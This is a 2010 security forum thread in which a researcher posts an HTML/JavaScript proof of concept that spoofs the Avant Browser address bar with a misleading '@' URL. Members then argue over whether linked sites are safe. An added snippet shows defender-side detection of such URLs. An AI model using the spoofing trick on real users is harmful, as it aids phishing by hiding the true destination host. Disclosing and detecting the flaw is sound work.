
Forum Thread: Avant Browser Address Bar Spoofing Vulnerability

You are currently viewing a forum thread in the Secunia Community Forum. Please note that opinions expressed here are not of Secunia but solely reflect those of the user who wrote it.

This thread was submitted in the following forum:
Vulnerabilities

This thread has been marked as locked.
Pouya Avant Browser Address Bar Spoofing Vulnerability
Member 19th Jul, 2010 16:53
Ranking: 4
Posts: 6
User Since: 9th Jun, 2010
System Score: N/A
Location: IR
<!--
Avant Browser (@) Address Bar Spoofing Vulnerability
Discovered by: Pouya Daneshmand
http://Securitylab.ir/Advisories
-->
<html>
<head>
<script type="text/javascript">
function Spoof()
{
window.open("http://www.Securitylab.ir@yahoo.com");
}
</script>
</head>
<body>
<form>
<p align="center">
<input type="button" value="Click Here" onclick="Spoof()">
</p>
</form>
</body>
</html>

--
http://Pouya.Securitylab.ir
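
Added example, not part of the original post or of any code by its author: a defender-side check for the URL shape the proof of concept above relies on, where the text before the "@" is userinfo and the real host comes after it. The function name inspectLink and the sample links (reserved example domains) are constructed for illustration.

```javascript
// Added example: detect links whose userinfo part imitates a hostname.
// inspectLink and the sample links below are constructed for illustration.
const HOSTLIKE = /^([a-z0-9-]+\.)+[a-z]{2,}$/i;

function inspectLink(raw) {
  let url;
  try {
    url = new URL(raw);
  } catch {
    return { raw, valid: false, suspicious: true, reason: "unparseable URL" };
  }
  // URL.username keeps percent-encoding, so decode it before matching.
  let user = url.username;
  try { user = decodeURIComponent(user); } catch { /* keep the raw form */ }
  const hasUserinfo = url.username !== "" || url.password !== "";
  // Userinfo that reads like a domain, but is not the host actually contacted.
  const imitatesHost = HOSTLIKE.test(user) && user.toLowerCase() !== url.hostname;
  // What an address bar can show safely: the same URL without credentials.
  const shown = new URL(url.href);
  shown.username = "";
  shown.password = "";
  return {
    raw,
    valid: true,
    realHost: url.hostname,
    userinfo: hasUserinfo ? user : null,
    suspicious: hasUserinfo && imitatesHost,
    safeDisplay: shown.href,
  };
}

// Constructed sample links covering the spoofing shape and benign cases.
const samples = [
  "http://www.example.com@example.net/",     // userinfo imitates a host
  "http://www%2Eexample%2Ecom@example.net/", // same, percent-encoded
  "http://alice:secret@intranet.example/",   // ordinary credentials
  "http://example.org/path",                 // no userinfo at all
];
for (const s of samples) {
  const r = inspectLink(s);
  console.log(r.suspicious ? "FLAG" : "ok  ", r.realHost, "<-", s);
}
```

A mail gateway, proxy or link preview can show safeDisplay instead of the raw link so that the host the browser will contact is the only hostname the user sees.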

taffy078 RE: Avant Browser Address Bar Spoofing Vulnerability
Contributor 19th Jul, 2010 17:44
Score: 408
Posts: 1,320
User Since: 26th Feb 2009
System Score: 100%
Location: UK
Last edited on 19th Jul, 2010 17:44
Please read what I posted in his Opera Browser thread***:

I suggest that you do not click on the link shown in this post until Secunia/an expert reads it and advises - unless you know what you are doing.

This post clearly is way beyond my technical ability but you may wish to look at the following Bing search results (or search yourself).

You'll see many unsafe sites in the search.

http://www.bing.com/search?q=pouya+Daneshmand&src=...


***http://secunia.com/community/forum/thread/show/478...

--
taffy078, West Yorkshire, UK

Desktop: Compaq Presario (OEM) 32 bit / AMD Athlon / 2 GB RAM
XP Home - SP3/ IE8/ Norton IS - Secunia PSI v2.0.0.3003

Laptop: Win 7 / IE11 / PSI v2.0.0.3003
Was this reply relevant?
+0
-0
Maurice Joyce RE: Avant Browser Address Bar Spoofing Vulnerability
Handling Contributor 20th Jul, 2010 01:47
Score: 11590
Posts: 8,901
User Since: 4th Jan 2009
System Score: N/A
Location: UK
I have tested all the sites on pages 1 & 2 produced from your hyperlink here:

http://www.bing.com/search?q=pouya+Daneshmand&src=

All are perfectly safe. If U fully research all the findings U will note that bad gradings have been contradicted by safe gradings.

This happens. Norton Safe, WOT & other like programmes are powered by user gradings or those owning websites registering their site.

Sites not reported on will receive a negative. That means nothing.

Reporting users can be novices suffering from total paranoia to researchers who file an accurate assessment of a site's safety.

At the end of the day these "add ons programmes" are advisories. If U have faith in your security there is no reason not to research sites, grade them & in most cases benefit from what they have to offer.


00:45 20/07/2010

--
Maurice

Windows 7 SP1 64 Bit OS
HP Intel Pentium i7
IE 11 for Windows 7 SP1
16GB RAM
Was this reply relevant?
+5
-0
taffy078 RE: Avant Browser Address Bar Spoofing Vulnerability
Contributor 20th Jul, 2010 08:59
Score: 408
Posts: 1,320
User Since: 26th Feb 2009
System Score: 100%
Location: UK
Last edited on 20th Jul, 2010 09:02
Thank you for that, Maurice.

As you know, I am not a technical expert when it comes to computers. I have to rely on the likes of Bing & Norton - both say that they test the sites, and they actually invite the owners of such sites to contact them to have the site tested. Tested sites have a red or green flag - untested sites a grey flag.

WOT is based on what users have said, as you say.

I wouldn't know how to test a site for 'safety', Maurice - I suspect many members wouldn't either. Are you saying that you simply open it and rely on your AV software to stop any problems if it is in fact a security risk site??

I do trust my AV but I wouldn't tempt fate. If I did, it would be just my luck to go to a site containing a threat that hasn't yet been picked up by my AV! :0)

Also, have you had chance to test the links in http://secunia.com/community/forum/thread/show/478...

--
taffy078, West Yorkshire, UK

Desktop: Compaq Presario (OEM) 32 bit / AMD Athlon / 2 GB RAM
XP Home - SP3/ IE8/ Norton IS - Secunia PSI v2.0.0.3003

Laptop: Win 7 / IE11 / PSI v2.0.0.3003
Was this reply relevant?
+0
-1
Pouya RE: Avant Browser Address Bar Spoofing Vulnerability
Member 20th Jul, 2010 12:22
Score: 4
Posts: 6
User Since: 9th Jun 2010
System Score: N/A
Location: IR
@taffy

Unsafe? What is your purpose?

--
http://Pouya.Securitylab.ir
Was this reply relevant?
+2
-0
irsdl RE: Avant Browser Address Bar Spoofing Vulnerability
Member 20th Jul, 2010 13:16
Score: 12
Posts: 10
User Since: 16th Jul 2010
System Score: N/A
Location: UK
"http://securitylab.ir/Advisories" is not accessible.
Could you please provide more information about your findings (App. Version, Vendor, Download Link, etc...).
For example "http://secunia.com/community/forum/thread/show/478..." does not work on the latest version of Opera Browser which is 10.60.
Thanks for contributing in advance.

--
------
Soroush Dalili
soroush.secproject.com/blog/
Was this reply relevant?
+0
-0
Pouya RE: Avant Browser Address Bar Spoofing Vulnerability
Member 20th Jul, 2010 14:09
Score: 4
Posts: 6
User Since: 9th Jun 2010
System Score: N/A
Location: IR
Avant Browser vulnerability tested on Version 11.7, build 45 (v11.7, build 46 is also vulnerable).
Opera 10.60 does not work? You are probably wrong; tested on Opera v10.60, build 3445, it works successfully.


--
http://Pouya.Securitylab.ir
Was this reply relevant?
+0
-0
Maurice Joyce RE: Avant Browser Address Bar Spoofing Vulnerability
Handling Contributor 20th Jul, 2010 14:20
Score: 11590
Posts: 8,901
User Since: 4th Jan 2009
System Score: N/A
Location: UK
@taffy078

I think @Pouya has answered the question for U. What is the point of all these warnings (policing) of threads when U are saying U have no idea how to test links?

Surely they should all be left alone until such time as Secunia deems them irrelevant & if necessary removes them.

I would certainly issue a warning if I could prove BEYOND doubt they were "troublesome". They are not hence I elect not to comment on individuals or hyperlinks contained within a post.

This thread is NO THREAT to anyone & as we can see has provoked a very relevant request for more information.

To save writing to other threads the same can be said for advertising of Passcert which appears to be disliked by "The Gang Of Three". They offer a lot more to the IT community than many clearly marked adverts on this thread which appear to come, in the main, from a PC comic called Computer Active.

http://secunia.com/community/forum/thread/show/465...

Better we leave all this warning (policing) type of activity to Secunia - they own both the programme & Forum & are very capable of telling us if things are amiss.

I note one Forum member considers himself part owner of the Forum. The mind boggles.

To answer your question directly, of course I open all these links where unnecessary doubt is raised about their authenticity merely to counter or confirm alarmist posts.

--
Maurice

Windows 7 SP1 64 Bit OS
HP Intel Pentium i7
IE 11 for Windows 7 SP1
16GB RAM
Was this reply relevant?
+7
-2
taffy078 RE: Avant Browser Address Bar Spoofing Vulnerability
Contributor 20th Jul, 2010 14:27
Score: 408
Posts: 1,320
User Since: 26th Feb 2009
System Score: 100%
Location: UK
Last edited on 20th Jul, 2010 14:28
Everyone who has a PC has to take care to make it secure - firewalls and anti-virus software are the most well-known & well-used tools in this respect. But it’s also essential that everyone takes care when accessing new websites. Some are unsafe.

When I checked out the link (in the first post) with Norton & Bing, many of the sites shown were flagged as unsafe. For example, one had four viruses: two Bloodhound, a Backdoor & a Trojan, according to Norton.
I do realise that these sites are likely to have been ones that had reported Pouya’s findings i.e. were not his sites.

I rely on Norton & Bing to advise me of sites on the web that I should avoid. That they may occasionally get it wrong doesn't bother me - I will always err on the side of caution, being a PC-user and not a PC-expert.

Norton's rating is a result of Symantec's automated analysis system, using their servers to analyze Web sites.
Yes - they do use reviews written by customers, some of whom may be paranoid, but these are shown separately.

As it was a Saturday i.e. likely that the Support team weren’t in, I simply posted an alert for members not to visit the linked sites until they or another expert had checked them out, or unless they knew what they were doing.
Maurice has since done that.

If you, Pouya, are the Pouya Daneshmand who discovered the vulnerabilities, I hope that you will accept my explanation.

But I would suggest that a great many members or viewers here are not experts so I stand by what I posted.

EDIT Crossed with yours, Maurice.

--
taffy078, West Yorkshire, UK

Desktop: Compaq Presario (OEM) 32 bit / AMD Athlon / 2 GB RAM
XP Home - SP3/ IE8/ Norton IS - Secunia PSI v2.0.0.3003

Laptop: Win 7 / IE11 / PSI v2.0.0.3003
Was this reply relevant?
+0
-0
Anthony Wells RE: Avant Browser Address Bar Spoofing Vulnerability
Expert Contributor 20th Jul, 2010 14:28
Score: 2426
Posts: 3,315
User Since: 19th Dec 2007
System Score: N/A
Location: N/A
Last edited on 20th Jul, 2010 14:40
@Pouya ,

If you are wishing to alert Secunia themselves to look at your findings , then you might wish to email them at vuln@secunia.com as suggested by this webpage in the Advisories section of this website :-

http://secunia.com/advisories/report_vulnerability...

This forum is more used for sorting out problems with updating programmes after the PSI or the CSI software have detected a vulnerable programme/piece of software/hardware ; of course some of the more technically advanced users might find your posting(s) here of interest .

Take care

Anthony

PS: I can confirm that the hyperlinks in this post are not working (for me) from France ; the "blog" link in your other Opera thread is working

--


It always seems impossible until its done.
Nelson Mandela
Was this reply relevant?
+6
-6
Pouya RE: Avant Browser Address Bar Spoofing Vulnerability
Member 20th Jul, 2010 16:01
Score: 4
Posts: 6
User Since: 9th Jun 2010
System Score: N/A
Location: IR
@irsdl
@Anthony Wells

Opera spoofing simple video ;)
http://www.youtube.com/watch?v=lHprYkpZn6w
Quality: 720p

--
http://Pouya.Securitylab.ir
Was this reply relevant?
+2
-1
thedillpickl RE: Avant Browser Address Bar Spoofing Vulnerability
Contributor 20th Jul, 2010 17:22
Score: 376
Posts: 872
User Since: 3rd May 2009
System Score: 100%
Location: US
Last edited on 20th Jul, 2010 17:31
I understand the original purpose of this thread (somewhat). This is not it. But, as the gang's all here...

1) I hold to the foolish notion that one should not go where one has no idea what's going on. (Go ahead and make your best crack at that comment, I've come to expect it.) Simply do a little research before running scripts on any machine. Looking at reports and papers on any website could be dangerous if that site is unknown to you. Click on a link and pow. BTW, you run a risk whenever you connect to the internet. If firewalled & security software is in place, it is slight, but still there.

2) If we (That's right, I said we.) are to work together on this forum, perhaps some guidance would be in order. Everyone will not be well versed on every subject. The discussion above is a start, less remarks.

3) I was the guilty party that said I take part ownership of this forum. Of course, it is Secunia's to do with as they please. I did not set it up. I did not pay for anything. I was not asked to moderate or take any control. However, I was invited to participate. If you are to participate it is required to become involved. If you are involved it is required to interact. This is hard to do, if not impossible, when those around you are not also allowed to participate. Last I checked, Secunia still calls this a forum and not a lecture hall.


Fred

p.s. Could we call this advertising? http://secunia.com/community/forum/thread/show/480...

--
XP Home
Chrome, Firefox, IE8
--
consilio et animis
Was this reply relevant?
+4
-4
Anthony Wells RE: Avant Browser Address Bar Spoofing Vulnerability
Expert Contributor 21st Jul, 2010 12:22
Score: 2426
Posts: 3,315
User Since: 19th Dec 2007
System Score: N/A
Location: N/A

@Pouya ,

Thank you for the link to your Opera spoofing video on YouTube ; most enlightening :)

Take care
Anthony

--


It always seems impossible until its done.
Nelson Mandela
Was this reply relevant?
+1
-1
